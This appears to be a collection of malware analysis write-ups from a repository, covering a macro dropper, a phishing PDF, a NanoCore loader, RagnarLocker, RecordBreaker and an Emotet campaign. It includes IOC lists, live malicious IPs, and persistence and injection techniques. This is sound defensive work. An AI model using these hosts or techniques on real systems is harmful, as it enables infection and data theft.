from Thailandia, who contains several hosts, common in Malware, his goal is to persist in the time, using the same attack but switching the host or to use some at the same time, our host is thz09 41 | 42 | ![image8](https://user-images.githubusercontent.com/91592110/136940007-b267690b-2226-4789-be8f-fd8369dd0882.png) 43 | 44 | ![image9](https://user-images.githubusercontent.com/91592110/136940017-d2e08762-9751-499c-ad4a-17f13baf705e.png) 45 | 46 | # _Behavior 47 | 48 | At this point, we now that this file is Malware, but we can research a little bit in his behavior, by now, we know this: 49 | 50 | > - Excel will run a Rundll32.exe after macro execution 51 | > - Will persist using regkeys 52 | > - Uses PE files as DLL 53 | > - Tries to connects and download a file into a malicious URL 54 | 55 | Launching the XLS again, accepting the macro execution, we see again the _Rundll32.exe_ 56 | 57 | ![image10](https://user-images.githubusercontent.com/91592110/136940484-04cd0395-48c7-4c9b-9e39-725456ab49c9.png) 58 | 59 | Later, Rundll32.exe, will find the DLL downloaded by the domain _asengjewelry.com_, trying to download a fake .jpg, but this is the dll 60 | 61 | ![image11](https://user-images.githubusercontent.com/91592110/136940525-32217181-7d8a-49dc-85d7-672de0588d97.png) 62 | 63 | ![image12](https://user-images.githubusercontent.com/91592110/136940549-5b6c260a-97ad-4ade-bb4f-74393e555ff8.png) 64 | 65 | Once the dll is downloaded, and we already have it a in the path that we saw at the previous point, drops it in Roaming, the DLL is the Goka.zzxxcc, and will persist using the COM creating a regkey, normaly, that campaign uses Schtasks to do that, usually, the malwares, uses _\CurrentVersion\RUN_, services or Tasks to gain persistence on our computers 66 | 67 | ![image13](https://user-images.githubusercontent.com/91592110/136940662-86d9cb95-2577-42af-b2db-5dfd430372c8.png) 68 | 69 | This Malware is usual at this world, it's normall see Malware writters using tricks as change the file extension, phising, fake Mail or public domains to infect machines, this files are really useful to gain persitence, and later... Open backdoors, make botnets and so on 70 | 71 | 72 | 73 | > :t-rex: [vc0=Rexor](https://github.com/vc0RExor) :detective: 74 | -------------------------------------------------------------------------------- /PDF/A phishing PDF downloader.md: -------------------------------------------------------------------------------- 1 | # _ Initial access: Phishing 2 | 3 | This PDF comes to our systems using Phishing techniques, it's common to see malicious files like docx, pdf, ppt, that tries to be downloaded using an UPS mail or a new policy on your Bank. Usually you will be expecting a shipping or it's not rare to see new changes on an account (Google, Amazon...) which are fake mails. Once the PDF arrives to you mail, it tryies to be downloaded cheating on you, later, when it's downloaded, it has disk access and if you launches the PDF using a pdf reader (Like acrobat, foxit...) It will run the malicious activity. 4 | 5 | # _Overview 6 | 7 | In the event that the user has not noticed that the mail is a fake URL or it's not a real mail, if you have already downloaded the PDF on your computer, we can see that it contains suspicious strings. We find interesting tags, URLs, pdf names, and so on, later we will analyze it, but we can start gathering IOC. As you can see, these URL are HTTPS, that's because is better to use a lot of hosts on a 443 domains and introduce paths used to malware, that will be closed after a few days, instead of use HTTP or random domains that some IPS/IDS will block instantly 8 | 9 | ![100000000000018C0000010CA4AF646E2A5294F8](https://user-images.githubusercontent.com/91592110/136981977-3d7eb64e-73f4-4dbf-9cb6-b9371d437539.png) 10 | 11 | There are detected elements, but we have a lot of URLs to create blacklists and to add at the IOC 12 | 13 | ![100000000000029C000000D18992B14A95BDD269](https://user-images.githubusercontent.com/91592110/136982040-752d1ff3-5832-4e06-90d3-f83a368f793e.png) 14 | 15 | In addition to URL and pdf names, we have several streams coded using different ways like /FlateDecode, it uses /Filter to give to the PDF information about how decode the chunk bytes, it's common to see these filters, using that you can hide domains, scripts and you can't see these using string or similar tools... let's say it makes analysis harder... 16 | 17 | ![100000000000009300000066EAE1BE83956AAF78](https://user-images.githubusercontent.com/91592110/136982073-c0db39a0-8eee-4a7e-b16f-815b4297f168.png) 18 | 19 | Now, we have several indicators that tell us that this could be a malicious PDF, we need to investigate on behaviour and later we will analyze these tags internally. 20 | 21 | # _Behaviour 22 | 23 | Once we have a background where we know that this PDF will do malicious behaviour we need to detect how it works. 24 | 25 | At runtime, the PDF will open several instances and it opens a window where it tries to check that we are not a robot, this is a FAKE authenticator because this is not a real form, it's a picture that tries to go to a cctraff[.]ru 26 | 27 | ![100000000000011D000000A999D35EC779D1DC73](https://user-images.githubusercontent.com/91592110/136982190-b430d2d1-7a23-4ede-9ead-af3486879bf1.png) 28 | 29 | ![behaviour](https://user-images.githubusercontent.com/91592110/136982493-a5f3e914-c8f9-4402-9c09-2a8351713034.png) 30 | 31 | This PDF has 2 pages, at the second one, we have some paths, pdf names and domains and some of them are already detected 32 | 33 | ![100000000000011E000000F25419F8ECE5E37D6A](https://user-images.githubusercontent.com/91592110/136982304-415aa384-8dcd-48d1-84d6-532ac825c90b.png) 34 | 35 | ![10000000000002A8000000D27E26B1C05CCF0BC9](https://user-images.githubusercontent.com/91592110/136982317-06e93412-80d2-4e40-a6f2-97662169e379.png) 36 | 37 | After we send the FAKE authenticator, it will take us to another fake authenticator (robotcheckion[.]online) who wants to allow notifications, but this is used to send us to a malicious web pages 38 | 39 | ![10000000000002C500000274994292EA85D51EE1](https://user-images.githubusercontent.com/91592110/136982358-54235596-e60c-4b31-98a5-5741d71772d7.png) 40 | 41 | Once launches the authenticator, we will find several URLs that tries to download another files or PDFs 42 | 43 | ![10000000000002010000001781968E2C8A449B6C](https://user-images.githubusercontent.com/91592110/136982522-85ba563e-3b36-46a7-bfb9-04e17afaf8ed.png) 44 | 45 | ![10000000000001A1000000203BD689BACD3B4360](https://user-images.githubusercontent.com/91592110/136982544-5f154188-60ef-4fab-a19d-5b984096b59e.png) 46 | 47 | Sniffing and analyzing network, we can see a lot of chrome.exe instances (Chrome uses a lot of instances as you know but this malware uses many URL) to tryies to download any file, that's not rare because these malware could be catched fastly and needs to have some webpages in case any enterprise block them. 48 | 49 | But we can see the URL access and the Fake authenticators: 50 | 51 | ![100000000000011A00000089197AEB424ACFB230](https://user-images.githubusercontent.com/91592110/136982631-78fb39f7-f794-41b5-aee4-5cfbb0011658.png) 52 | 53 | ![10000000000001030000007A13EDF8F71867B116](https://user-images.githubusercontent.com/91592110/136982644-26b603d6-a647-4e44-9d3d-c30ad7589205.png) 54 | 55 | It's normal that when you are analyzing the sample you can't find any active URL or you need to search among of Web Pages that contain the malware, but you only need to be patient and find one that download the file to complete your analysis (If you have the downloadable file names, you can search out in [VirusTotal](https://www.virustotal.com/gui/home/search) or [AlienVault](https://otx.alienvault.com/browse/global) if all the domains are already closed) 56 | 57 | Talking about registers, the malware adds some byte to chrome.exe using UserAssist and erase caches (That's not rare), but we don't have any persistence trick on this, this which would be the most worrying, not occurs, in case you did not know, count on UserAssist will be do using ROT-13, this practise and modify extensions value, you can see it on some Adware, but we don't have rare behaviours related with RegKeys on our Malware. 58 | 59 | An example of ROT-13: 60 | 61 | ![1000000000000424000000121C900F137E0AF2F3](https://user-images.githubusercontent.com/91592110/136982941-59785539-e547-451e-a31b-7e30c7e62536.png) 62 | 63 | ![100000000000013E000000B4C3D61CB4A751E40C](https://user-images.githubusercontent.com/91592110/136982959-e81c1ff5-b6bc-44b3-9a87-ae6eac5330ba.png) 64 | 65 | The behaviour it's rare to a legit PDF, now we have a good background to locate several URLs and we have information on how it works dynamically and we goes to an internal static analysis to know if this is the only thing that it does 66 | 67 | # _Static Analysis 68 | 69 | Now we need to know if the functionality it's based on search among URL list and download another files and PDF malwares or if there is something else. 70 | 71 | First of all we see the PDF tags and we have interesting elements, some objects, URI (We're not surprised) and we have good news, no JavaScript there, for what it's possible that we are facing a Malware PDF Downloader 72 | 73 | ![10000000000000DD0000011CAA2C9B97155C111D](https://user-images.githubusercontent.com/91592110/136983050-f6e7bb93-3b5d-4dce-8c9e-49cd37b351e3.png) 74 | 75 | We found several elements related with colors, buttons and so on, that's the graphic components of the PDF (The first fake Authenticator) some /Filters using /FlateDecode to decompress streams 76 | 77 | ![10000000000000BF000000C2451C5876AE498FEB](https://user-images.githubusercontent.com/91592110/136983104-56e388e9-4d14-4e58-a687-4934d8d8ccdf.png) ![1000000000000095000000A9D760ACC89F85AE1D](https://user-images.githubusercontent.com/91592110/136983123-87b9e62e-a4aa-4883-ac75-c479d708ae4d.png) 78 | 79 | Later, using /Annot, we have reference to URI that we are looking for (Showing the object 17 and 19): 80 | 81 | ![10000000000002A3000000CAE6416424A280BCA2](https://user-images.githubusercontent.com/91592110/136983208-d902e43c-9c50-4844-a2bc-78a69881e7d1.png) 82 | ![1000000000000296000000D16E8A85589E004D88](https://user-images.githubusercontent.com/91592110/136983257-676a3bd5-0105-4c8d-a3c0-83a107a3ab47.png) 83 | 84 | Also, all of URL are referred by the Object 40, as you can see, each of URL are represented by an obj, among values 17 and 32 (As you can see at the picture below) any object can download other Malwares referring to different domanins and files (Previous image) 85 | 86 | ![100000000000034A0000003AAC2E640B9EA7241A](https://user-images.githubusercontent.com/91592110/136983324-f22399a8-3546-47d9-b3f7-9192020bdf6e.png) 87 | 88 | Into the PDF we don't have any more interesting , we have a lot of URL, PDF and file reference, and the rest are graphic content such as Fake authenticators, fonts, buttons, and so on. 89 | This time, unfortunately, we don't have elements as JavaScript, because this Malware is based on a Downloader, Its purpose is to mislead the user into believing that this PDF is a portal to other web pages and that needs to verify that you are not a robot by making forms looking like a real authenticator in which will be downloaded using other malicious web pages other files or PDFs. To these Malwares typically using Phishing techniques it's advisable a good enterprise policy, avoiding specific domains and training workers so that they distinguish a real mail to a fake mail, let's not forget that the greatest weakness is the user. 90 | 91 | # _IOC 92 | 93 | ``` 94 | hXXps://cctraff[.]ru/aws?keyword=download+pdf+to+excel+converter+full+version 95 | hXXps://cdn.shopify[.]com/s/files/1/0432/0319/9138/files/gogigisoladavatafanitu.pdf 96 | hXXps://cdn.shopify[.]com/s/files/1/0433/8050/6773/files/zobusijamojanag.pdf 97 | hXXps://cdn.shopify[.]com/s/files/1/0268/8394/8740/files/rojiriloxiwuruzobo.pdf 98 | hXXps://cdn.shopify[.]com/s/files/1/0268/8529/2223/files/bezesube.pdf 99 | hXXps://cdn.shopify[.]com/s/files/1/0268/8529/2223/files/bezesube.pdf 100 | hXXps://cdn.shopify[.]com/s/files/1/0437/6199/1841/files/sovavejipizivaduf.pdf 101 | hXXps://s3.amazonaws[.]com/henghuili-files/aparato_reproductor_femenino_funciones.pdf 102 | hXXps://s3.amazonaws[.]com/mijedusovineti/31436972639.pdf 103 | hXXps://s3.amazonaws[.]com/henghuili-files/93071167754.pdf 104 | hXXps://s3.amazonaws[.]com/jepinebawo/anatomy_knee_joint.pdf 105 | hXXps://uploads.strikinglycdn[.]com/files/d11907ef-8a0e-4bb7-b17c-9ae1ff5d9692/pixazubepojo.pdf 106 | hXXps://uploads.strikinglycdn[.]com/files/7e1ef169-b688-4b2c-b347-d5a633848cdd/21685658051.pdf 107 | hXXps://uploads.strikinglycdn[.]com/files/fbc2e3e8-f23a-4c63-97f3-e0be6e5efc54/67514968450.pdf 108 | hXXps://fidurelofomus.weebly[.]com/uploads/1/3/0/7/130740547/zumuxojezudag.pdf 109 | hXXps://xesaranit.weebly[.]com/uploads/1/3/2/6/132696194/divuwixudibar.pdf 110 | hXXps://cdn-cms.f-static[.]net/uploads/4389616/normal_5f900636493b8.pdf 111 | hXXps://cdn-cms.f-static[.]net/uploads/4369494/normal_5f8b051093f1f.pdf 112 | ``` 113 | 114 | 115 | > :t-rex: [vc0=Rexor](https://github.com/vc0RExor) :detective: 116 | -------------------------------------------------------------------------------- /RAT/NanoCore/A VBS loader of NanoCore.md: -------------------------------------------------------------------------------- 1 | # _Overview 2 | 3 | _NanoCore is a RAT (Remote Admin Tool) used by cybercriminal groups such as APT33 (Refined Kitten) whose InitialAccess is varied, although it has been most commonly used through fake emails with .zipx extensions or with fake formats, which is commonly called phishing (T1566) or in this case, since it contains a file in the email and its objective is execution on disk to go further, it would be more accurate to call it Spearphishing (T1566.001)._ 4 | 5 | The main potential of NanoCore is usually minning or steal data from the computer and user once it has gained access to the disk, but once it is inside, it could perform any action from the outside, and, of course it depends of version. 6 | 7 | To this analysis, I have divided into two parts, which is usually a common practice in which we observe first statically everything we can get in the shortest possible time and then a dynamic in which we will see how it behaves, although, we will lose information if we do not monitor properly or not debug. 8 | 9 | # _Static Analysis: Obfuscated Script 10 | 11 | We start from a VisualBasicScript (VBS) which is quite obfuscated although we can distinguish some interesting words like "_http_" or "_OwerSheL_" and some "_replace_" that will help us in the deobfuscation, for now we can't see much so we have to get on work. 12 | 13 | ![image](https://user-images.githubusercontent.com/91592110/139471648-e3465f5e-b7ac-47a7-bbb2-4dedd01dfb4e.png) 14 | 15 | After working the script in the deobfuscate and get the most in the shortest possible time, we can see in a small scheme how this first stage works. On it, we find an IP [ _52[.]231.98[.]236_ ] to which it will make a download request using "_DownloadString_", as expected, using powershell and after this, it will execute the content that downloads 16 | 17 | ![image](https://user-images.githubusercontent.com/91592110/139471880-9c73a086-1d7c-4188-ab2a-a330e2712a18.png) 18 | 19 | At a controlled environment, we visit the website against which the request is made, we may find another similar script (the one executed previously) which, as usual in this type of loaders, hides another obfuscated script creating script chains so that the analysts lose interest or increase the difficulty of the analysis and that campaigns last as long as possible. 20 | 21 | ![image](https://user-images.githubusercontent.com/91592110/139471974-26258efa-b8bc-46d3-8bf0-6f9fde4efe27.png) 22 | 23 | Later, we will find another obfuscated script that will try to do the same as the previous one, complicate the work and make us know the minimum of the attack. 24 | 25 | ![image](https://user-images.githubusercontent.com/91592110/139472315-1da288ab-bdc6-4f9f-b0a3-69b6f969ae3d.png) 26 | 27 | After the previous script, we move on to the next one, in which we can see how it makes another request to the same IP but this time using another file (_Server.txt_) that at the time of analysis was already supposed to be another obfuscated file, which we will see now. After this obfuscation, we can see that the attacker manages to generate persistence in RUN by introducing a New.vbs file in it, which is none other than the same file as before that will execute again every time the system is launched, what would be Persistence (TA0003) whose more concrete technique would be T1547. 28 | 29 | We see that it also collects in variables the RegKey _\Explorer\User Shell Folders_ to generate persistence, simply, you can enter a registry key in the previous key pointing to _\Public\Run\New.vbs_ and you will get the desired execution at each session startup. 30 | 31 | Persistence Using Regkey pointing to vbs: 32 | ``` 33 | HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders 34 | HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders 35 | ``` 36 | ![image](https://user-images.githubusercontent.com/91592110/139473111-03257fef-3043-4948-8eca-85cc15a29f0c.png) 37 | 38 | For a better understanding, a scheme of the deofuscation would be the previous one, in which we observe in cascade, in a summarized way, how the deofuscation has been done, after this, the connection to the IP releases another file that as we can see, alerts us of a PE signature with the typical _0x4D5A_ 39 | 40 | As we have seen in the previous image, we take out the binary and, as expected, we get the NanoCore client, as usual, with an obfuscator on top. 41 | 42 | ![image](https://user-images.githubusercontent.com/91592110/139473921-6e9e5944-f900-4158-bf8a-38a4f5710eb9.png) 43 | 44 | # _Dynamic Analysis: Monitoring execution 45 | 46 | After the static section, we can know how it is going to behave and we have clear where to put the focus, so we observe how the powershell is going to be executed, in which, we see how it makes the request to the first web and if we did not have the file physically, we would have to extract it manually from this request. 47 | 48 | An important aspect is the use of aspnet_compiler.exe, since it is usual in this type of RAT to inject the code (or perform process hollowing) of the final binary in a legitimate software, we will see that it stays started after the execution of the loader, the reason is simple, the RAT has already started and is doing its task which, at first glance you can not see anything abnormal. We can also see injected MSBuild.exe. 49 | 50 | ![image](https://user-images.githubusercontent.com/91592110/139474281-fc36362d-8231-437a-9472-72653033ed13.png) 51 | 52 | After running the powershell, we can see the same request 2 times to obtain the succession of obfuscated scripts, in which at the end, we obtain the RAT 53 | 54 | ![image](https://user-images.githubusercontent.com/91592110/139474330-46e85380-c300-4e40-a1f1-393bd8d9645b.png) 55 | 56 | ![image](https://user-images.githubusercontent.com/91592110/139474364-c60ddb80-fa11-48af-8fac-f436a2a17239.png) 57 | 58 | After this, we see how it has introduced the file in _\public\run_ so it has generated the persistence in the registry key that we had mentioned in the previous section. 59 | 60 | ![image](https://user-images.githubusercontent.com/91592110/139474555-9a495ae9-6740-40a9-929e-16b649f667fd.png) 61 | 62 | Then, we will see, as usual in this Malware, it collects certain information obfuscating it and introducing it in some path of \AppData\ or \Public\ with extensions .dat, usual directories of use in this type of actions to avoid as far as possible that it is not found. 63 | 64 | ![image](https://user-images.githubusercontent.com/91592110/139474569-668aac42-5e51-412f-895d-4bb6d38e3cab.png) 65 | 66 | 67 | > :t-rex: [vc0=Rexor](https://github.com/vc0RExor) :detective: 68 | 69 | 70 | 71 | -------------------------------------------------------------------------------- /RAT/Readme: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Quick-Analysis -------------------------------------------------------------------------------- /Ransomware/RagnarLocker/Quick view RagnarLocker.md: -------------------------------------------------------------------------------- 1 | # _Overview 2 | 3 | _RagnarLocker is a Ransomware normally associated with the APT Viking Spider whose InitialAccess is varied, but as usual, they perform direct attacks trying to exploit systems or after the abuse of legitimate applications or by implanting malware inside these, after these movements, the most common is to gain maximum access and control within the attacked company to encrypt as many computers as possible._ 4 | 5 | # _Technical Analysis 6 | 7 | At the first steps, we find a common function in the Ransomwares that tries to determine which country runs the Malware, this is because certain groups use targets depending on the country and avoid certain countries, as we can see it locates which country we belong to using _GetLocaleInfoW_ and compares it to an internal list of countries as an exclusion, in the case that our country was in the list and the function returned any of the list, it would end the execution. 8 | 9 | ![image](https://user-images.githubusercontent.com/91592110/139923142-19aa7ac8-2b13-4c2e-8a89-103490001972.png) 10 | 11 | List of country languages: 12 | 13 | ``` 14 | Belorussian 15 | Azerbaijani 16 | Ukrainian 17 | Moldavian 18 | Georgian 19 | Armenian 20 | Turkmen 21 | Russian 22 | Kyrgyz 23 | Kazakh 24 | Uzbek 25 | Tajik 26 | ``` 27 | 28 | Later, it obtains the computer name and user data, as well as the MachineGUID of the computer using the Microsoft RegKey Crypthography or the ProductName using the RegKey _Windows NT\Current Version_, something that Ransomwares usually do to obtain information from the computer that they can then use to identify the machines. 29 | 30 | ![image](https://user-images.githubusercontent.com/91592110/139928520-4eced539-28fe-463e-ab68-0a50fc2722d1.png) 31 | 32 | ![image](https://user-images.githubusercontent.com/91592110/139928541-f62a525d-4347-44e9-a4f4-7cb21694671c.png) 33 | 34 | ![image](https://user-images.githubusercontent.com/91592110/139928549-15463579-6611-49eb-be85-bd27251436d5.png) 35 | ![image](https://user-images.githubusercontent.com/91592110/139928561-80278c35-7098-46a9-a70e-ff63b7f67340.png) 36 | 37 | After identifying disks to be encrypted, it is dedicated to enumerate services, in which, we can see that it uses the _EnumServiceStatusA_, in which it will ask the DB of the control manager (previously opened with _OpenSCManagerA_) and will compare each one of the services with the internal list, in case it finds something related to its exclusion list it will close it using _CloseServiceHandle_. 38 | 39 | ![image](https://user-images.githubusercontent.com/91592110/139928691-6c4ee9ef-2ef1-4984-8d96-2fc38ec4d895.png) 40 | 41 | List of exclusion services: 42 | 43 | ``` 44 | vss 45 | sql 46 | memtas 47 | mepocs 48 | sophos 49 | veeam 50 | backup 51 | pulseway 52 | logme 53 | logmein 54 | connectwise 55 | splashtop 56 | kaseya 57 | ``` 58 | 59 | After that, it will create the usual ransom note in which it will ask for money (usually cryptocurrencies) to ransom the encrypted files, as we can see, it will first create the file by obtaining from memory the name of the txt and will perform the first creation in _\Public\Documents_, directory obtained through the _CSIDL_ identifier using _SHGetSpecialFolderPathW_, after creating it it will rescue from memory both the data it contains in a predefined way and the hash it will create as our identifier that will be used to contact the attackers, in this case using _qTox_. 60 | 61 | ![image](https://user-images.githubusercontent.com/91592110/139929143-3fbf3f58-6d6f-4c50-9792-0b8fe929cf16.png) 62 | 63 | ![image](https://user-images.githubusercontent.com/91592110/139929262-fc805c87-0d4f-43be-ab0f-151eeb950f7c.png) 64 | 65 | ![image](https://user-images.githubusercontent.com/91592110/139929384-5bc991ae-fe43-487c-917d-8ad61c0acd39.png) 66 | 67 | Later, it will try to encrypt the files avoiding some folders, files and extensions that it will also check in memory, avoiding touching what it does not need to encrypt or that could alert of its presence, it will make a loop to check the files in each case. 68 | 69 | ![image](https://user-images.githubusercontent.com/91592110/139929648-c8bb803a-7bbc-483c-b65d-2410815bf0dd.png) 70 | ![image](https://user-images.githubusercontent.com/91592110/139929663-fc42bb04-a67a-43f6-8e67-05de7e463315.png) 71 | 72 | ![image](https://user-images.githubusercontent.com/91592110/139929675-b29517f8-a1df-4096-83a8-f6ad45208a99.png) 73 | 74 | An example of what a short file would look like before and after being encrypted, in which we can see how it will introduce the keys and the RAGNAR tag at the end. 75 | 76 | ![image](https://user-images.githubusercontent.com/91592110/139929936-57087b2c-f250-438c-8039-22412f371d2d.png) 77 | 78 | ![image](https://user-images.githubusercontent.com/91592110/139929941-080fad57-ef6c-4195-a230-2d3a28a182df.png) 79 | 80 | Finally, to execute the txt in the default session in which the RagnarLocker has worked, it performs an _Interactive window station_ in which we will see how it gets the session identifier, the process that is running the Ransomware, duplicate your token, get the session, and so on, to spawn the file in the session and that, at the end of its operation, we know what are the steps and what has happened in each of the affected computers. 81 | 82 | ![image](https://user-images.githubusercontent.com/91592110/139930089-c224d2a2-3e72-487b-bf7f-5a2d4bddfea7.png) 83 | 84 | > :t-rex: [vc0=Rexor](https://github.com/vc0RExor) :detective: 85 | 86 | 87 | 88 | -------------------------------------------------------------------------------- /Ransomware/Readme: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /RecordBreaker/RecordBreaker.md: -------------------------------------------------------------------------------- 1 | # _Overview 2 | 3 | _RecordBreaker or RacoonStealerV2 is the new version of the stealer Racoon that we can buy as malware-as-a-service at the black markets under $300. Widely used in mass campaigns or used by criminal groups where they try to infect repositories or attach this malware usually compressed in ZIP/RAR format. Its main objective is to reach the largest number of victims and contains different phases including process injection, binary downloading and information theft._ 4 | 5 | # _Technical Analysis 6 | 7 | RecordBreaker usually appears in infected repositories or in attachments as a compressed file that when opened will execute a binary, which depending on the version, will make connections outside in different ways in order to geolocate, check for internet connection or download files, if this phase is fulfilled, it will execute an injection in a legitimate binary, usually related to .NET as RegAsm, InstallUtil or Regsvcs from where it will perform the information theft. 8 | 9 | ![image](https://user-images.githubusercontent.com/91592110/193622883-b7c05e8b-f640-40dd-aea7-253e3e333fb9.png) 10 | 11 | An example of execution flow is the following in which after a zip, a binary is executed that makes a request to a malicious IP and then launches a sleep encoded of 12 seconds to inject RegAsm.exe 12 | 13 | ![image](https://user-images.githubusercontent.com/91592110/193624249-b3b4d9a4-bf6d-4768-a1e6-729731d2ddf7.png) 14 | 15 | In some versions it performs fake PNG/JPG downloads, if it fails to make the connection, the next phase is not performed. 16 | 17 | ![image](https://user-images.githubusercontent.com/91592110/193624765-df4165ac-a11f-40ed-8341-67557c14fc44.png) 18 | 19 | RecordBreaker generates persistence by creating a task with a name similar to the structure of a CLSID 20 | 21 | ![image](https://user-images.githubusercontent.com/91592110/193625182-99dbf25c-1837-4d64-b3e6-ff633c885e30.png) 22 | 23 | Task name example: 24 | 25 | ``` 26 | \{0A2620E2-3469-4C1A-AD19-BD835A6FA571} 27 | ``` 28 | 29 | After this initial phase, it performs an injection, commonly using processes related to .NET, we can see how it will perform a process suspension, and then write in the (WriteProcessMemory) modify the thread context to get all the info of this (SetThreadContext) and when it has done all the operation release the thread in which it is writing. 30 | 31 | ![image](https://user-images.githubusercontent.com/91592110/193626223-03d7dacf-e53e-457b-b320-38335471a8d3.png) 32 | 33 | Processes to be considered for injection: 34 | 35 | > - RegSvcs.exe 36 | > - RegAsm.exe 37 | > - AppLaunch.exe 38 | > - InstallUtil.exe 39 | > - aspnet_compiler.exe 40 | 41 | Once injected into the legitimate process, RecordBreaker will start working, in the first phase, it will resolve imports, since by itself, it only has the ability to load other APIs/libraries with _GetProcAddress_ + _LoadLibraryW_. When it has all the new libraries and APIs loaded, we will get a better understanding of the code, and the malware, new capabilities. 42 | 43 | ![image](https://user-images.githubusercontent.com/91592110/193627753-deba8711-f8a2-4754-ba95-9474d86713c7.png) 44 | 45 | We can see how it performs a reinfection control using Mutex with a hardcoded string 46 | 47 | ![image](https://user-images.githubusercontent.com/91592110/193628250-8c7c8255-f58d-431d-b12e-674a5dc34f0c.png) 48 | 49 | And we can see how it obtains data that will be used later encrypted in RC4. 50 | 51 | ![image](https://user-images.githubusercontent.com/91592110/193628432-b8b24203-0a2e-4c4f-a545-6c5b309d0613.png) 52 | 53 | After a decryption phase, it collects data from the machine, user, search engines, etc. Which it will collect on the basis of an internal configuration. 54 | 55 | In this phase, we can also see, depending on versions, how it performs download requests to malicious IPs to bring more functionalities to the code. 56 | 57 | ![image](https://user-images.githubusercontent.com/91592110/193629025-5883e72f-9933-4eaf-94f8-bd3b2d3f2aa2.png) 58 | 59 | To obtain the data, RecordBreaker will use SQLite to perform queries and obtain all the information it is interested in, and then save it in files that it will send to the C&C. 60 | 61 | ![image](https://user-images.githubusercontent.com/91592110/193629354-02df0565-2a14-4855-90e2-3bd570b2bf9b.png) 62 | 63 | The main information that RecordBreaker usually steals is: 64 | 65 | > - Browser (Cookies, User info, Passwords) 66 | > - Telegram info 67 | > - Bank Information (Cards/Accounts) 68 | > - CrytpoWallets 69 | 70 | All this information will be sent to a C&C server and since you have performed a persistence, it can continue to increase this information :) 71 | 72 | # _IOC 73 | 74 | ### _SHA256 75 | ``` 76 | 502e941d65f743b781b0214c9c37b8d4cca4b27fa7d62be943a63a9de93812d3 77 | 7f2e0645947bc96cd2f5edd2260db48f09102dcfd0fcd85896d287c1b621770d 78 | 7dc73e29c582c16283115de0c5d03ecc102b47b82f4b4e957f2630d935967b61 79 | B5137e4be20605c7ad8b5bc1045210c9c42ae4190be76aab1bc72e0a71c703d2 80 | Ba69e1ed08c7288821223595c9b220bc5c53d0485930958a1db415a3f7f56945 81 | 767cdc4f8adf3bdfeec2879b0976476dcc0aeeeee5e524d3c2e4ade70c181e9c 82 | 207256464e91fde4a35aad23a7a56ef9f9438cd3ef946418f6e06a00e70d7808 83 | D184612e2f0b0b065986b94869296330d56e356e2d1ef077461e064bdcb4d3a2 84 | 0050ab6912e9c63bb65930ef52094fca855f8dab9210f74b1d9e2c6c61c9d5b0 85 | dba0be52e9c4d97b164f7c131710f4761b16b2c4ddacafe5cfe10bfbc6148c3c 86 | 3bf0e1d823e337ba4372bd55bb57d93789bda09c5bf3d8b82a308781c8f9a09f 87 | 3339d515567a632170ca67cf4ee006f24166f9fb47b317b44abada6f5174d1f9 88 | 69eac55ff687843f9d856e7facdef36d1c53faa5df6ff3eab874a1426a5efcea 89 | 4dd0e5762e6ae6553863f594262e8a1d3f48635d1f49ced7975fc5842fa69a14 90 | ``` 91 | 92 | ### _IP 93 | 94 | ``` 95 | 89.208.104.46 96 | 88.119.170.241 97 | 85.192.63.46 98 | 206.166.251.254 99 | 172.111.36.191 100 | 102.130.114.185 101 | 91.201.25.172 102 | 94.131.107.239 103 | 193.106.191.223 104 | ``` 105 | 106 | ### _Domains 107 | 108 | ``` 109 | http://rgyui[.]top 110 | http://acacaca[.]org 111 | ``` 112 | 113 | > :t-rex: [vc0=Rexor](https://github.com/vc0RExor) :detective: 114 | 115 | -------------------------------------------------------------------------------- /SilentBuilder/SilentBuilder.md: -------------------------------------------------------------------------------- 1 | # _Overview 2 | 3 | _SilentBuilder is a campaign that is being used to launch bankers such as Emotet to increase the Epoch5 botnet as well as the usual tasks of this malware. The similarities between other loaders that launch Emotet and that, once the banker is in our computer, tries to contact C&C, we could understand that this is a typical modus operandi of the criminal group Mummy Spider or TA542._ 4 | 5 | # _How it Works 6 | 7 | The attacker will access our system after a phishing email, more specifically SpearPhishing [T1566.002], as it will contain an attachment such as an XLS or DOCX, after this, since the document will contain macros or hidden functions, it will download a file, usually a dll, once downloaded it will be launched on the computer abusing Regsvr32.exe to search a list of C&C servers. 8 | 9 | ![0](https://user-images.githubusercontent.com/91592110/165115747-2f771d13-1043-4af2-825c-a55c5ae62601.png) 10 | 11 | # _Static Analysis 12 | 13 | Once the document is downloaded, we find, in my case, an xls, which after a glance we can see that it contains interesting functions that will run automatically when opened. 14 | 15 | ![1](https://user-images.githubusercontent.com/91592110/165120891-d9d71949-a3a3-4926-be9b-9ca350d44b4e.png) 16 | 17 | An interesting fact is that in this sample we see that it has the usual warning that will launch the functions and, in addition, another warning made by the attacker that will be a simple image. 18 | 19 | ![2](https://user-images.githubusercontent.com/91592110/165121338-1c2a8930-f0f8-40e5-9826-813890d61234.png) 20 | 21 | After this, we see a completely blank document, with no pages, no macros… Inquiring, we see that it does have internally pages with characteristic names and that they were hidden. 22 | 23 | ![3](https://user-images.githubusercontent.com/91592110/165122164-89f7db54-ba5e-4d0a-94dc-810e1ebda71b.png) 24 | 25 | Once again the sheets are empty... After reviewed the document and by changing the color of all the pages we found all the functions obfuscated and disordered. 26 | 27 | ![4](https://user-images.githubusercontent.com/91592110/165122974-c0cdd14b-01ff-4923-9d28-78c60223957e.png) 28 | 29 | In one of the sheets, we find the most important function, which would deobfuscate most of the functionality that will have the functions of the document. 30 | 31 | We obtain, as we can see, functionalities for downloading a supposed library (nhth.dll) from different domains: 32 | 33 | ![5](https://user-images.githubusercontent.com/91592110/165123309-199782a9-80bb-4d94-90ef-eabc19f95af3.png) 34 | 35 | # _Dynamic Analysis 36 | 37 | _Once we have an idea of how the document is going to work internally, let's check if we are right._ 38 | 39 | We see that once the excel is launched, it makes a request to a domain and downloads a file (we observe in the network traffic the MZ header typical of Windows PE). After this, we can see that it downloads the dll in \users\\< YourUser >\\ , and then it will move it to the path \AppData\Local\\< RandomName >\\ with another name < RandomName >.adj 40 | 41 | ![image](https://user-images.githubusercontent.com/91592110/165127834-d79cec5f-9b27-482d-97d2-df88463f176a.png) 42 | 43 | We can see that if we compare the file obtained from the network traffic and the one found in \users\ or in \AppData\ , it is the same file. 44 | 45 | 